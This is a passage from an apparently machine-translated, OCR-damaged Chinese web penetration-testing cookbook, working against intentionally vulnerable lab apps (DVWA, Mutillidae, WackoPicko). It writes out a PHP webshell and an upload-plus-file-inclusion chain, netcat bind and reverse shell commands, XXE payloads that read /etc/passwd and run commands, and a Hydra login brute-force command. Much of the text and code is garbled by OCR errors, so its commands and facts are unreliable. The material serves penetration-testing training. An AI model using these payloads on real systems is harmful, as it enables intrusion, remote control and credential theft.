网 络 访问 ， 敏 感 数据 泄露 ， 以 及 其 它 。 同 时 ， 要 当心 不 要 影响 系统 的 可 用 性 或 者 为 丨 正 的 攻 
击 者 留 下 后 门 。 


之 前 的 章节 中 ， 我 们 已 经 涉及 了 如 何 检 测 Web 应 用 中 的 一 些 漏洞 。 这 一 章 中 我 们 打算 了 解 如 
何 利 用 这 些 漏洞 并 使 用 它们 来 提取 信息 和 获得 应 用 及 系统 受 限 部 分 的 访问 权 。 


1 和 恶意 使 用 文件 包含 和 上 传 


我 们 在 第 四 章 中 看 到 ， 文 件 包 含 汤 洞 在 开发 者 对 生成 文件 路 径 的 输入 校 验 不 当 ， 并 使 用 该 路 
径 来 包含 源 代 码 文件 时 出 现 。 服 务 端 语言 的 现代 版 本 ， 例 如 PHP 自 5.2.0 起 ， 将 一 些 特性 默 
认 关 闭 ， 例 如 远程 文件 包含 ， 所 以 2011 年 起 就 不 大 可 能 找到 RFI 了 。 


这 个 秘籍 中 ， 我 们 会 上 传 一 些 和 恶意 文件 ， 其 中 之 一 是 Webshell (可 用 于 在 服务 器 中 执行 命 
的 页 面 ) ， 之 后 使 用 本 地 文件 包含 来 执行 
准备 


这 个 秘籍 中 ， 我 们 会 使 用 vulnerable vm 中 的 DVWA ， 并 以 中 等 安全 级 别 配置 ， 所 以 让 我 们 


3， 将 安全 级 别 设 置 为 中 。 访 问 pwa Security ， 在 组 合 框 中 选择 medium 并 点 击 submit ° 


我 们 会 上 传 一 些 文件 给 服务 器 ， 但 是 你 需要 记 住 它们 储存 在 哪里 ， 以 便 之 后 调用 。 所 以 ， 在 
DVWA 中 访问 upload 并 上 传 任何 JPG 图 人像。 如 果 成 功 了 ， 他 会 告诉 你 文件 上 传 到 
了 ../../hackable/uploads/ 。 现 在 我 们 知道 了 用 于 储存 上 传 文件 的 相对 路 径 。 这 对 于 秘籍 就 


Ag o 
我 们 也 需要 准备 好 我 们 的 文件 ， 所 以 让 我 们 创建 带 有 一 下 内 容 的 文本 文件 : 


«? 

system($ GET['cmd']); 

echo '«form method="post" action-z"../../hackable/uploads/webshell. php"><input type-"t 
ext" name-z'"cmd"/»«/form»'; 

?> 


将 其 保存 为 webshell.php 。 我 们 需要 另 一 个 文件 ， 创 建 rename.php 并 输入 下 列 代 码 : 
<? 
system('mv ../../hackable/uploads/webshell.jpg ../../hackable/uploads/ webshell.php'); 


PD 
这 个 文件 会 接受 特殊 图 像 文件 ( webshel1.jpg ) 并 将 其 重 命名 为 webshell.php ° 


操作 步骤 


1. 首先 ， 让 我 们 尝试 上 传 我 们 的 Webshell。 在 DVWA 中 访问 upload 之 后 尝试 上 
传 webshell.php ^? 像 这 样 


Your image was not uploaded, 








ums |, Vulnerability: File Upload 
Instructions — hs 

Choose an image to upload: 
sen WS a 
Brute Force | Upload 





Command Fxecutian 
于 是 ， 这 里 对 于 我 们 能 够 上 传 的 东西 有 个 验证 。 这 意味 着 我 们 需要 上 传 图 标 文件 ， 或 更 
精确 来 说 d 带 有 EUM ^ BEND 或 .png 的 图 像 文 件 2 这 就 是 为 什么 我 们 需要 重 命名 脚本 
来 还 原 原 始 文件 的 ,php 扩展 ， 便 于 我 们 执行 它 。 


2. 为 了 避免 验证 错误 ， 我 们 需要 将 我 们 的 PHP 文件 重 命名 为 有 效 的 扩展 名 。 在 终端 中 ， 我 
们 需要 访问 PHP. 文件 所 在 目录 并 创建 它们 的 副本 : 


cp rename.php rename.jpg 
cp webshell.php webshell.jpg 


3， 现 在 ， 让 我 们 返回 DVWA 并 尝试 上 传 二 者 : 


Vulnerability: File Upload 


Choose an image to upload: 


| Upload | 


. /hackable/uploads/webshell.jpg succesfully uploaded! 





4. 一 旦 两 个 JPG 文件 都 上 传 了 ， 我 们 使 用 本 地 文件 包含 漏洞 过 来 执行 rename.jpg ° 访问 文 
件 包 含 部 分 并 利用 这 个 漏洞 来 包含 ../../hackable/uploads/rename jpg 





















































ES- | | 192.168.56.102/dvwa/wulnerabilities/fi/?page - ../../hackable/uploads/rename.jpg 





我 们 并 没有 得 到 这 个 文件 执行 的 任何 输出 ， 我 们 需要 假设 webshell.jpg 命名 
为 webshell.php ° 


5b. 如果 它 能 工作 ， 我 们 应 该 能 够 包含 ../../hackable/uploads/ webshell.php ， 让 我 们 试 
TA : 


Damn Wulnerable Web A x \ — 
m2 182 16B.56 102/dvwalulnerabilities/fi/?7ba Je=,./ /hackable/uploads webshel php 


isb rife antig 





6. 在 左上 角 的 文本 框 中 ， 输 入 / Sbin/ifconfig 并 按 下 回 车 : 


和 http:;//192.1...962Fifconfig x &y 
H= (*192.168.56.102/dewa/hackable/uploads/webshell php?crnd — ae or E WEGE 20H X* 


ra 

* sthD Link encap:Ethernet HWaddr 08:00:27:3T:c5:c4 inet addr-192.168.56.102 Beast:192.166.556.255 Mask:255.255.255.0 

P inet addr: feg: a00 27: fe3t.c5ca64 ScopeiLink UP BROADCAST RUNNING MULTICAST MTU:1 300 Matric:l Rx 
packets:458 errors:0 dropped:o overruns:ü frame:0 TX packets:381 errars:D dropped 0 averruns:o carner:ü collisions:o 

* txqueuelen:i ODO RX bytes:113194 (113.1 KB) TX bytes:206327 (206.3 KB] Interrupt:10 Base address: OxdOZO lo Link 

E  encap: Local Loapback inet addr:127.0.0.1 Mask:255,0.0.0 1nete addr: : 1/128 Scope:Host UF LOODPBRACK RUNNING 
MITU:16436 Metric: l RX packets:431 errars:D dropped:o overrur 18:0 frama: 0 TA packaLs: es :| erro ips: dropped:ü 

-| overruns:) carrier: collisions:) txqueuelen:0 RX bytes:79103 (79.1 KB) TX bytes;78103 (79.1 KB] 

. 

Ll 


并 且 它 能 够 工作 。 就 像 图 片 中 那样 ， 服 务 器 的 IP 192.168.56.102 。 现 在 ， 我 们 可 以 在 
服务 器 中 执行 命令 ， 通 过 将 它们 键入 到 文本 框 中 ， 或 者 为 cmd 参数 设置 不 同 的 值 。 


在 上 传 有 效 JPG 文件 时 ， 我 们 所 做 的 第 一 个 测试 是 为 了 发 现 上 传 文件 保存 的 路 径 ， 便 于 我 们 
可 以 在 rename.php 中 ， 以 及 表单 的 action 中 使 用 这 个 路 径 


使 用 重 命名 脚本 有 两 个 重要 原因 : 首先 ， 上 传 页 面 只 允许 JPG 文件 ， 所 以 我 们 的 脚本 需要 这 
个 扩展 名 ， 其 次 ， 我 们 需要 带 参 数 调 用 我 们 的 webshell (要 执行 的 命令 ) ， 而 我 们 从 Web 服 
务 器 调用 图 片 时 不 能 带 参 数 。 


PHP 中 的 system 函数 是 攻击 核心 ， 它 所 做 的 是 ， 执 行 系统 命令 并 显示 输出 。 这 允许 我 们 将 
webshell 文件 从 .jpg 重 命 名 为 .php 文件 并 执行 我 们 指定 为 GET 参数 的 命令 。 
更 多 


一 旦 我 们 上 传 并 执行 了 服务 端 代码 ， 我 们 有 很 多 选择 来 攻陷 服务 器 ， 人 例如， 下列 代码 可 以 在 
REKI shell 中 调用 : 


nc -lp 12345 -e /bin/bash 
它 打 开 服 务 器 的 TCP 12345 端口 并 监听 连接 。 连 接 建 立 之 后 ， 它 会 将 接收 的 信息 作为 输入 来 
执行 /bin/bash ， 并 把 输出 通过 网 络 发 给 被 连接 的 主机 (攻击 者 主机 ) o 


也 可 以 让 服务 器 下 载 一 些 恶意 程序 ， 例 如 提 权 利用 ， 执 行 它 来 获得 更 高 权限 。 


6.2 利用 OS 命令 注入 


在 上 一 个 秘籍 中 ， 我 们 看 到 PHP 的 systemo 如 何 用 于 在 服务 器 中 执行 OS 命令 。 有 时 开发 
者 会 使 用 类 似 于 它 的 指令 ， 或 者 相同 的 功能 来 执行 一 些 任务 ， 有 时 候 他 们 会 使 用 无 效 的 用 户 
输入 作为 参数 来 执行 命令 。 


这 个 秘籍 Y oc 我 们 会 利 用 命 ag AEA M i] 来 提取 服务 里 中 的 重要 信 息 2 


操作 小 
1. 登录 DVWA 访 问 command Execution ° 


2. 我 们 会 看 到 Ping for FREE 表单 ， 试 试 它 吧 。Ping 192.168.56.1 (在 主机 网 络 中 ， 我 们 
的 Kali Linux 的 IP) 。 


六 草 利用 -- EIRE 


Vulnerability: Command Execution 
Ping for FREE 


Enter an IP address below 


p 


- | [submit | 


PING 192.168.56.1 (192.168.56.1) 56(84) bytes of data. 

64 bytes from 192.168.56.1: icmp seq-1 ttl-54 time-0.175 ms 
64 bytes from 192.168.56.1: icmp seq-2 ttl-64 time=0. 336 ms 
64 bytes from 192.168.56.1: icmp seq-3 ttl-64 timezo.201 ms 


--- 192.168.56.1 ping statistics --- | 
3 packets transmitted, 3 received, O% packet loss, time l998ms 
rtt mn/avg/max/mdev = 0.175/0.237/0.336/0.071 ms 





这 个 输出 看 起 来 像 是 直接 的 ping 命令 的 输出 。 这 表明 服务 器 使 用 OS 命令 来 执行 ping。 
所 以 它 可 能 存在 OS 命令 注入 。 


3. 让 我 们 尝试 注入 一 个 非 第 简单 的 命令 ， 提 交 下 列 代码 : 


192.168.56.1;uname -a. 


Vulnerability: Command Execution 
Ping for FREE 


Enter an IP address below: 
|| submit | 


PING 192.168.56.1 (192.168.56.1) 56(84) bytes of data. 
64 bytes from 192.168.56.1: icmp seq-1 ttl-64 time-0.129 ms 


64 bytes from 192.168.56.1: icmp seq-2 ttl-64 time-0.145 ms 
64 bytes from 192.168.56.1: icmp seq-3 ttl=64 time-0.144 ms 


--- 192.168.56.1 ping statistics --- 
3 packets transmitted, 3 received, O% packet loss, time 1998ms 
rtt LP E LI Tai i = = 0.129/0.139/0.145 Q. 012 ms 


Linux Owas spbwa 2.5. "M = 25- ge oper ric -pae #44- - Ubuntu SMP 





我 们 可 以 看 到 uname 命令 的 输出 就 在 ping 的 输出 之 后 。 这 里 存在 命令 注入 漏洞 。 


4， 如 果 不 带 IP 地 址 会 怎么 样 呢 : ;uname -a: ° 


Ping for FREE 


Enter an IP address below: 





Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 201% 


117 


5. 现在， 我 们 打算 获取 服务 端的 反 向 shell。 首 先 我 们 必须 确保 服务 器 拥有 所 需 的 任何 东 
西 。 提 交 下 列 代 码 : ,1s /bin/nc* ° 


/bin/nc 
/bin/nc.openbsd 
/bin/nc.traditional 


所 以 我 们 拥有 多 于 一 种 版 本 的 Netcat， 我 们 打算 使 用 它 来 生成 连接 。 nc 的 OpenBSD 版 
本 不 支持 执行 连接 命令 ， 所 以 我 们 使 用 传统 的 版 本 。 


6， 下 一 步 是 监听 Kali 主 机 的 连接 。 打 开 终 端 并 执行 下 列 命 令 


7. 返回 浏览 器 中 ， 提 交 这 个 : ,nc.traditional -e /bin/bash 192.168.56.1 1691 & ° 
I[](img/6-2-5.jpg 


我 们 的 终端 会 对 连接 做 出 反应 。 我 们 现在 可 以 执行 非 交 互 式 命令 并 检查 它们 的 输出 。 


工作 原理 


就 像 SQL 注入 的 例子 那样 ， 命 令 注入 漏洞 的 来 源 于 弱 输 入 校 验 机 制 ， 以 及 使 用 用 户 提供 的 数 
据 来 拼接 之 后 会 用 做 OS 命令 的 字符 串 。 如 果 我 们 查看 刚刚 攻击 的 页 面 源 代码 (每 个 DVWA 
页 面 的 右 下 角 会 有 个 按钮 ) ， 会 看 到 这 些 


<?php 
if( isset( $ POST[ 'submit' ] ) ) ( 


$target - $ REQUEST[ 'ip' ]; 


T S and execute j mmand . 
if 人 en eT o NT JJ st 
$cmd = shell exec( 'ping ' . $target ); 
echo '«pre-'.$cmd. «/pre»'; 


} else { 
$cmd = shell_exec( 'ping -c 3 ' . $target ); 
echo '<pre>'.$cmd.'</pre>'; 
j 
j 
2» 


我 们 可 以 看 到 ， 它 直接 将 用 户 的 输入 附加 到 ping 命令 后 面 。 我 们 所 做 的 仅仅 是 添加 一 个 分 
号 ， 系 统 的 shell 会 将 其 解释 为 命令 的 分 隔 符 ， 以 及 下 一 个 我 们 打 萌 执行 的 命令 。 


在 成 功 执行 命令 之 后 ， 下 一 步 就 是 验证 服务 器 是 否 拥有 Netcat。 它 是 一 个 能 够 建立 网 络 连接 


的 工具 ， 在 一 些 版 本 中 还 可 以 在 新 连接 建立 之 后 执行 命令 。 我 们 看 到 了 服务 器 的 系统 拥有 两 
个 不 同 版 本 的 Netcat， 并 执行 了 我 们 已 知 支持 所 需 特 性 的 版 本 。 


之 后 我 们 配置 攻击 系统 来 监听 TCP 1691 端口 连接 (也 可 以 是 任何 其 它 可 用 的 TCP 端口) > 
然后 我 们 让 服务 器 连接 到 我 们 的 机 器 ， 通 过 该 端口 并 在 连接 建立 时 执行 /bin/bash ( &4 
shell) 。 所 以 我 们 通过 连接 发 送 的 任何 东西 都 会 被 服务 器 接收 作为 shell 的 输入 。 


也 可 以 让 服务 器 下 载 一 些 恶 意 程 序 ， 例 如 提 权 利用 ， 执 行 它 来 获得 更 高 权限 。 


6.3 利用 XML 外 部 实体 注入 
XML 是 主要 用 于 描述 文档 或 数据 结构 的 格式 ， 例 如 ，HTML 是 XML 的 实现 ， 它 定义 了 页 面 和 
它们 的 关系 的 结构 和 格式 。 


XML 实体 类 似 于 定义 在 XML. 结构 中 的 数据 结构 ， 它 们 中 的 一 些 能 够 从 文件 系统 中 读 取 文 件 或 
者 甚至 是 执行 命令 。 


这 个 秘籍 中 ， 我 们 会 利用 XML 外 部 实体 注入 漏洞 来 在 服务 器 中 执行 代码 。 
准备 
建议 你 开始 之 前 遵循 上 一 个 秘籍 中 的 步骤 。 


de H; 
操作 步骤 
1. 浏览 http://192.168.56.102/mutillidae/index.php?page-xmlvalidator.php ° 


2， 上 面 写 着 它 是 个 XML RER o LRM ARELA RLRE o E XML 输入 
框 中 ， 输 入 «somexml-»«message-Hello World</message></ somexml» ? 并 点 


击 Validate XML 。 


XML Submitted 


«somexml »emessage»Hello World«/message»«/somexml» 


Text Content Parsed From XML 
Hello World 


3. MELLRE TEMLE T EA c RA AIJNARA : 


<!DOCTYPE person [ 
<!ELEMENT person ANY> 
<!ENTITY person "Mr Bob"> 
]» 


«somexml»«message-»Hello World &person;«/message»c/somexml» 


AJ ` 
"Er 


4. 


XML Submitted 


<IDOCTYPE person [ <!ELEMENT person ANY> «!ENTITY person "Hr Bob"- ]» «somexml-«nessage-Hello World person; 
« /messages« /somexml = 


Text Content Parsed From XML 
Hello World Mr Bob 


这 里 ， 我 们 仅仅 定义 了 实体 并 将 值 "Mr Bob" 赋 给 它 。 解 析 器 在 展示 结果 时 解释 了 实体 并 
替换 了 它 的 值 。 


这 就 是 内 部 实体 的 使 用 ， 让 我 们 尝试 外 部 实体 : 


«IDOCTYPE fileEntity [ 

<!ELEMENT fileEntity ANY» 

«I!ENTITY fileEntity SYSTEM "file:///etc/passwd"» 
] > 


«somexml»«message-»Hello World &fileEntity;«/message»c/somexml» 


XML Submitted 


«!DOCTYPE fileEntity [ «!ELEMENT fileEntity AMY- «!ENTITY fileEntity SYSTEM "file:///etc/passwd"» ]» «somexnl- 
«message-Hello World &fileEntity;«/nessage-«,somexml» 

































































Text Content Parsed From XML 

Hello World raot:x:0:O:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bir/sh 
bin:x:2:2:bin:;/bin:/bin/sh sys:x:3:3:sys:;/dewv;/bin/sh sync:x:4:65534:;sync:/bin:/bin/sync 
games:x:5:50:games:/usr/dgqames:/bln/sh man:x:6:12:man:/var/cache/man:/bin/sh Ip:x: 7: 7:Ip:var 
/spoollpd:/bin/sh mail:x:8:8:rail:^var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh 
uucp:x:10:10:uucp:/var/spool/uucp:/bln/sh proxy:x:13:13:proxy:/bin:/bin/sh 
www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh 
I5t:x:38:38:Malling List Manager :/var list:/bin/sh irc:x:39:38:Ircd:/var/runircd:bin/sn 
gnats:x:41:41:Gnats Bug-Reporting System (adrmin):/var/lib/gnats:/bin/sh 

nobody x:65534:65534:nobody:/nonexistent:/bin/sh libuuld:x:100:101 :/var/lib/libuuid:/bin/sh 
syslog:x:101:102::/home/syslog:/bir/false klog:x:102:103::;/home/klog:/bin/false 
mysql:x:103:105:MySQL Server ,,,:var/lib/mysql:/bin/false landscape:x:104:122 :;/var/lib/landscape: 
/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologim postgres:x:106:109:PostgreSQL 
administrator,,,:/var/lIb/postgresql:/bin/bash messagebus:x:107:114::/var/run/adbus:/bln/false 
tomcat5:x:108:115::/usr/share/tomcat6 /bin/false user:x:1000:1000:user,,,:/home/user:/bin/bash 
polkltuser:x:109:118:PolicyKit,,,:var/runyPollcyKit:/bir/false haldaemon:x:110:119:Hardware 
abstraction layer,,,:/var/run/hald:/bin/false pulse:x:111:120:PulseAudio daemon,,,:^var/run/pulse: 
/bIn/false postfix:x:112:123::/var/spool/postfix /bin/false 


使 用 这 个 技巧 ， 我 们 就 可 以 提取 系统 中 的 任何 文件 ， 只 要 它们 可 以 在 Web 服务 器 的 运 和 
环境 被 用 户 读 取 。 


我 们 也 可 以 使 用 XEE 来 加载 页 面 。 在 上 一 个 秘籍 中 ， 我 们 已 经 设法 将 webshell 上 传 到 
服务 器 中 ， 让 我 们 试 试 吧 。 


<!DOCTYPE fileEntity [ 

<!ELEMENT fileEntity ANY» 

«I!ENTITY fileEntity SYSTEM "http://192.168.56.102/dvwa/hackable/uploads/ websh 
ell.php?cmd-/sbin/ifconfig"» 
] > 


«somexml»«message-»Hello World &fileEntity;«/message»c/somexml-» 


N^ 
ND 
C)» 
Se 


XML Submitted 

«IDOCTYPE fileEntity | «!ELEMEMT fileEntity ANY» «!EHTITY fileEntity SYSTEM "fhrttp:,//192.168.56.102 
/dvwa/hackable uploads. webshell.php?cmd-/sbin/ifconfiq"'» ]» «somexml»«message»Hello World &fileEntity; 
«/message-«/somexml > 


Text Content Parsed From XML 


Hello World etho Link encap:Ethernet HWaddr O08:00:2 7:3Fc5:c4 inet addr:192.158.55.102 
Bcast:192,168.56,255 Mask:255.255,255.0 inet6 addr: feB0::a00:2 7ff:fe3f.c5c4/64 Scope:Link UP 
BROADCAST RUNNING MULTICAST MTU:1500 Metric: 1l RX packets:592 errors: O dropped:o 
overruns:O frame:0 TX packets:648 errors:O dropped:O overruns:O carrier:O collisions:O 
txqueuelen: 1000 RX bytes:111258 (111.2 KB) TX bytes:322831 (322.8 KB) Interrupt:10 Base 
address:0xdO020 lo Link encap:Local Loopback inet addr:12 7.0.0.1 Màsk:255.0.0.0 inet addr: 
"1/128 Scope:Host UP LOOPBACK RUNNING MTL): 156436 Metric:l RX packets: 2008 errors:O 
dropped:O0 overruns:O frame:O TX packets:2008 errors:Q dropped:O overruns:O carrier:O 
callisions:Q txqueuelen:O RX bytes:322155 (322.1 KB) TX bytes:322155 (322.1 KB) 


工作 原理 


XML 拥有 叫做 实体 的 特性 。XML 实体 是 与 值 关联 的 名 称 ， 每 次 实体 在 文档 中 使 用 的 时 候 ， 它 
都 会 在 XML 文件 处 理 时 替换 为 值 。 使 用 它 以 及 不 同 的 可 用 包装 器 ( file:// 来 加 载 系统 文 
件 ， 或 者 http:// 来 加 载 URL) ， 我 们 就 可 以 通过 输入 校 验 和 XML 解析 器 的 配置 ， 和 恶意 使 用 
没有 合理 安全 措施 的 实现 ， 并 提取 敏感 数据 或 者 甚至 在 服务 器 中 执行 系统 命令 。 


这 个 秘籍 中 ， 我 们 使 用 file:// 包装 器 来 使 解析 器 加 载 服务 器 中 的 任意 文件 ， 之 后 ， 使 
用 http:// 包装 器 ， 我 们 调用 了 网 页 ， 它 碰巧 是 同一 个 服务 器 中 的 webshell， 并 执行 了 一 些 


命令 。 


更 多 
这 个 漏洞 也 可 以 用 于 发 起 DoS 攻击 ， 叫 做 “Billion laughs”， 你 可 以 在 维基 百科 中 阅读 更 多 信 


息 : https://en.wikipedia.org/wiki/Billion laughs ° 


PHP 也 支持 不 同 的 XML 实体 包装 器 (类 似 于 file:// 和 http:// ) ， 如 果 它 在 服务 器 中 被 
FÈ? Ce ， 它 就 是 expect:// o 你 可 以 在 这 Xx W dX 
到 更 多 它 和 其 它 包装 ds 器 的 信息 exo. http://www.php.net/manual/en/wrappers.php ? 


7 见 

XXE 漏洞 如 何在 世界 上 最 流行 的 站 点 上 发 现 的 例子 ， 可 以 在 这 里 查 

看 : http://www.ubercomp.com/posts/2014-01-16 facebook remote code execution 9? 
E orb ue 

6.4 使 用 Hydra ax % 83 


Hydra 是 网 络 登 录 破 解 器 ， 也 就 是 在 线 的 破解 器 ， 这 意味 着 它 可 以 用 于 通过 爆破 网 络 服务 来 
发 现 登 录 密 码 。 爆 破 攻击 尝试 猜测 正确 的 密码 ， 通 过 尝试 所 有 可 能 的 字符 组 合 。 这 种 攻击 一 
已 能 找到 答案 ， 但 可 能 要 花费 数 百 万 年 的 时 间 。 


虽然 对 于 渗透 测试 者 来 说 ， 等 待 这 么 长 时 间 不 太 可 行 ， 有 时 候 在 大 量 服务 器 中 测试 一 小 部 分 
用 户 名 /密码 组 合 是 非常 有 效 举 的 。 


这 个 秘籍 中 ， 我 们 会 使 用 Hydra 来 爆破 登录 页 面 ， 在 一 些 已 知 用 户 上 执行 爆破 攻击 。 
准备 


我 们 需要 拥有 用 户 名 列表 ， 在 我 们 浏览 vulnerable vm 的 时 候 我 们 在 许多 应 用 中 看 到 了 有 效 
用 户 的 一 些 名 称 。 让 我 们 创建 文本 文件 users. txt. ， 内 容 如 下 : 

admin 

test 

USer 


user1 
john 


操作 步骤 


1. 我 们 的 第 一 步 是 分 析 登 录 请 求 如 何 发 送 ， 以 及 服务 器 如 何 响应 。 我 们 使 用 Burp Suite 来 
捕获 DVWA 的 登录 请 求 : 


Í wa ere | HTTP history | Websackets history I Options 





Pd Request to http:/192.168.56 102.80 
Fareard | Drop Intercept is on | Action 
m m * 
_| Raw Params | Headers | Hex 


POST /dewa/lagin.php HTTP/1.1 äi | 
Hast: 192.165.55,102 





Lser-Agent: Mozilla/5.0 (XIL; Linux x86 64; rv:18.0] Gecko/20100101 Firefox/18.0 

Accept: text/html,application/xhtmlexml,application/xml;qs0.9, */*;q-0.B 

Accept-Language: en-Us,en;q-0.5 

Accept-Encoding: gzip, deflate 

Raforer: http://192.168,56,102/dvwa/login.php 

Cookie: securityslow; JSESSIONIDsFEDASEASS5F]1938BFDEF1599165-D7CBAB; acopendividssswingset,]otto,phpbb2,redm ne; 
acgroupswithpersistenada; PHPSESSIDeE]kltz7Bbrnzhbasdbtssnmags7o0 

Connection: keep-alive 

Content-Type: application/x-www-farm- urlencaded 

Content-Length: 4D 


usernamezardmaz n&passwordztesth eginsLagin 


我 们 可 以 看 到 请 求 是 /dwwa/login.php ， 它 拥有 三 个 参 


数 : username ^ password 和 login ? 


2. 如 果 我 们 何止 捕获 请 求 ， 并 检查 浏览 器 中 的 结果 ， 我 们 可 以 看 到 响应 是 登录 页 面 的 重 定 
向 o 


Burp Suite Free Edition v1.6.01 eoo 


Burp Intnader Repeater Window Help 
| Tarqet | Praxy 
eam Intercept | HTP history. HTTP hiatory, 





















Decoder Extender 





Spider | Scanner | Intruder | Repeater 





Segquencer comparer Oplions 





websSockets history | Options 


| Fiter: Hiding CSS, image an d general binary cantent | ? 
X ^ 下 | Hast Menag URL | Params Edited | Status dandi MIME ET Extension Titl 





49 — httpj/192.168.55.102 A idvw: ve gin. T p | d 200 1413 HM 


"iu - — — : = y "o. 























Request | Respanse l| 
(Jj Raw | Headers | H&x 


HTTP/1.1 302 Found n 
Date: Màn, OF TER 2015 23:06:20 GMT 

Serwar: Apachae/ 14 (Lbuntu) mod mano/2.4.3 PHP/5,3.2-lubuntu4,5 with Suhosin-Patch proxy html/3.0.]1 mod python/3.3.] 
Pythan/2.6.5 mo d cunis /2.2.14 Open5SL/0.9.5k Phusion Passenger/3.0.17 mod perl/2.0.4 Perl/v5.10.1 


X-Puwered- By: PHP, 5.3.2- lubuntuaá.5 

Explres: Thu, 18 Nov 19581 08:52:00 GMT 

Cache-Contral: no-store, no-cache, must-revalidate, post-checksO, pre-chackrsQ 
Pragma: na-cache 

Location: Lem nep . 

Vary: Accept-Encoding 

Content-Length: 0 


Keep- Alive: timeout-15, max-l00 





Lannaction: keap-AL1vwàa 


Content-Type: text/html 


有 效 的 用 户 名 /密码 组 合 不 应 该 直接 重 定 向 到 登录 页 面 ， 而 应 该 是 其 它 页 面 ， 例 

如 index.php 。 所 以 我 们 假设 有 效 登 录 会 重 定向 到 其 它 页 面 ， 我 们 会 接受 index.php 作为 
用 于 分 辨 是 否 成 功 的 字符 串 。Hydra 使 用 这 个 字符 串 来 判断 是 否 茶 个 用 户 名 /密码 被 拒绝 
ra 


d» 


3. 现在， 我 们 准备 好 攻击 了 ， 在 终端 中 输入 下 列 命 


hydra 192.168.56.102 http-form-post "/dvwa/login.php:username-^USE R^&password-^PA 
SS^&Login-Login:login.php" -L users.txt -e ns -u -t 2 -w 30 -o hydra-result.txt 





我 们 使 用 这 个 命令 只 尝试 了 两 个 用 户 名 组 合 : GST EP ARRA o RAMAZA 
攻击 之 中 得 到 了 两 个 有 效 密码 ，Hydra 中 标 为 绿色 。 


工作 原理 


这 个 秘籍 的 第 一 个 部 分 是 捕获 和 分 析 请 求 ， 用 于 了 解 请 求 如 何 工作 。 如 果 我 们 考虑 登录 页 面 
的 输出 ， 我 们 会 看 到 消息 “登录 失败 "， 并 且 可 以 使 用 这 个 消息 作为 Hydra 的 输入 来 充当 失败 的 
字符 串 。 但 是 ， 通 过 检查 代理 的 历史 ， 我 们 可 以 看 到 它 出 现在 重 定向 之 后 ，Hydra 只 读 取 第 一 
个 响应 ， 所 以 它 并 不 能 用 这 也 是 我 们 使 用 login.php 作为 失败 字符 串 的 原因 ? 


我 们 使 用 了 多 个 参数 来 调用 Hydra : 


e 首先 是 服务 器 的 IP 地 址 。 

e http-form-post : 这 表明 Hydra 会 对 HTTP 表单 使 用 POST 请 求 。 接 下 来 是 由 冒号 分 隔 
的 ， 登 录 页 面 的 URL。 请 求 参数 和 失败 字符 串 由 & 分 隔 ， auser 和 anpassa 用 于 表示 用 
户 名 和 响 码 应 该 在 请 求 中 被 放置 的 位 置 。 

e -L users.txt : 这 告诉 Hydra 从 users.txt 文件 接收 用 户 名 称 。 

e -e ns : Hydra AŽ E RA HA A P ANEA RA o 

o -u : Hydra 会 首先 迭代 用 户 名 而 不 是 密码 。 这 意味 着 Hydra 首 先 会 对 单一 的 密码 尝试 所 
有 用 户 名 ， 之 后 移动 到 下 一 个 均码 。 这 在 防止 账户 锁定 的 时 候 很 有 用 。 

e -t 2 :我 们 不 想 让 登录 请 求 卉 满 服 务 器 ， 所 以 我 们 使 用 两 个 线程 ， 这 意味 前 每 次 两 个 请 

e -w30 :设置 超时 时 间 ， 或 者 等 待 服务 器 响应 的 时 间 。 

e -o hydra-result.txt : 将 输出 保存 到 文本 文件 中 。 当 我 们 拥有 几 百 个 可 能 有 效 的 均码 时 
这 会 很 实用 。 


P 


要 注意 我 们 没有 使 用 -p ARRARIR’ RA -x 选项 来 自动 生成 密码 。 我 们 这 样 做 是 
因为 爆破 Web RPT 生 很 大 的 网 络 28 流量 ? 如 果 服 务 器 它 没 有 防护 Zee 生 DoS 的 ] 情 JL o 


不 推荐 使 用 大 量 的 密码 在 生产 服务 器 上 执行 爆破 或 字典 攻击 ， 因 为 我 们 会 使 服务 器 崩溃 ， 阻 
拦 有 效用 户 ， 或 者 被 客户 端的 保护 机 制 阻拦 


推荐 渗透 测试 者 在 执行 这 种 攻击 时 对 每 个 用 户 党 试 四 次 ， 来 避免 被 阻拦 。 例 如 ， 我 们 可 以 党 
试 -e ns ， 就 像 这 里 做 的 这 样 ， 之 后 添加 -p 123456 来 测试 三 种 可 能 性 ， 没 有 密码 、 密 码 和 
用 户 名 一 样 以 及 密码 为 123456 ， 这 是 世界 上 最 弟 见 的 密码 之 一 。 


6.5 使 用 Burp Suite 执行 登录 页 面 的 字典 爆破 


Burp Suite 的 Intruder ride HTTP 请 求 的 许多 部 分 执行 模糊 测试 和 爆破 攻击 。 在 执行 登录 
页 面 上 的 字典 攻击 时 非 第 


这 个 秘籍 中 ， 我 们 会 使 用 Burp Suite 的 Intruder 和 第 二 章 生 成 的 字典 来 通过 登录 获得 访问 
权 。 


准备 


这 个 秘籍 需要 字典 列表 。 它 可 以 是 来 自 目 标语 言 的 简单 单词 列表 ， 常 见 密码 的 列表 ， 或 者 我 
们 在 第 二 章 “ 使 用 John the Ripper 生成 字典 ”中 的 列表 。 


Tk TE oy Jk 


BGEGHE-4&EUXxx 


第 一 步 是 设置 Burp Suite 用 作 浏 览 器 的 代理 。 
B E http://192.168.56.102/WackoPicko/admin/index.php ° 


我 们 会 看 到 登录 页 面 ， 让 我 们 党 试 和 测试 用 户 名 和 密码 。 
现在 访问 大 力 的 历史 ， 并 查看 我 们 刚刚 生成 的 登录 的 POST 请 求 : 





intercept -HTTP history | WebSockets history | Options | 





Filter: Hiding CS5, image and general binary content L2 


* 4| Hast | Method | URL | Params | Edited | Status Length | MIME type | Extension | Titi 
a p /192.168.56.102 GET MWackoPickojadrminlindex. popi. OU 200 907 text php 
































Parama Headers H&x 





POST /WackoPicko/admin/index.php?pageslogin HTTP/1.1 à 
Hast: 192. 168.55. 107 

Lser-Bgent: Mozilla/5.0 (X11; Linux Be &4; rv:18.D) Gecko/20100101 Firefox’ 18.0 
Accept: text/html,application/xhtml«xml,application/xml;q-0,59,*/*:3-0, 8 
Accept-Language: en-LS,en;qso.s 

Accept-Encoding: gzip, deflate 

Referer: http://152.168,.56.102/wackaPicko/admn/index.php?page-login 

Caokle: PHPSESSID-31pS5mmzés7]n7prdes5aspadevi 

